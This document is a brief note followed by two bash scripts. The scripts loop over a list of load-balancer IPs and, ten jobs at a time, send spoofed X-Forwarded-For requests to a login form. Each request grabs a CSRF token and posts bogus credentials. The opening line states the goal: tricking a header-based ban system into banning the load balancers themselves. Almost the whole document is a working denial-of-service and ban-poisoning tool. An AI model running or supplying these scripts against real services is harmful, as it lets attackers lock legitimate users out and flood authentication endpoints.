if something bans based on x-forwarded-for, you might be able to get it to ban stuff

invoke.sh

#!/usr/bin/bash

while true; do cat loadbalancer-ips ; done | parallel --jobs 10 'bash sma.sh {} backend.example.com'

sma.sh

#!/usr/bin/bash

COOKIES=$(mktemp)
forwarder=${1}
node=${2}

GET(){
    forwarder=$1
    host=$2
    target=$3
    verbose=$4
    echo "GET ${target} as ${forwarder}"
    curl --insecure -H "Host: ${host}" -H "X-Forwarded-For: ${forwarder}" \
         ${verbose} -so /dev/null -c ${COOKIES} ${target}
}

find_csrf_token(){
    tail -1 ${COOKIES} | cut -f 7
}

POST(){
    forwarder=$1
    host=$2
    target=$3
    referer=$4
    verbose=$5
    echo "POST ${target} as ${forwarder}"
    curl --insecure -H "Host: ${host}" -H "X-Forwarded-for: ${forwarder}" \
         -H "Referer: ${referer}" -d csrfmiddlewaretoken=$(find_csrf_token) \
         -d birth_date=01%2F05%2F1977 -d auth_pass=dos -d id_number=900000000 \
         -d auth_pass=foobar -d "csrfmiddlewaretoken=$(find_csrf_token)" -s \
         -w "%{http_code} %{speed_download} %{time_total}\n" -o /dev/null \
         --cookie "csrftoken=$(find_csrf_token)" ${verbose} ${target}
}

date
GET ${forwarder} frontend.example.com https://${node}
POST ${forwarder} frontend.example.com https://${node} https://frontend.example.com

trap "rm -rf ${COOKIES}" EXIT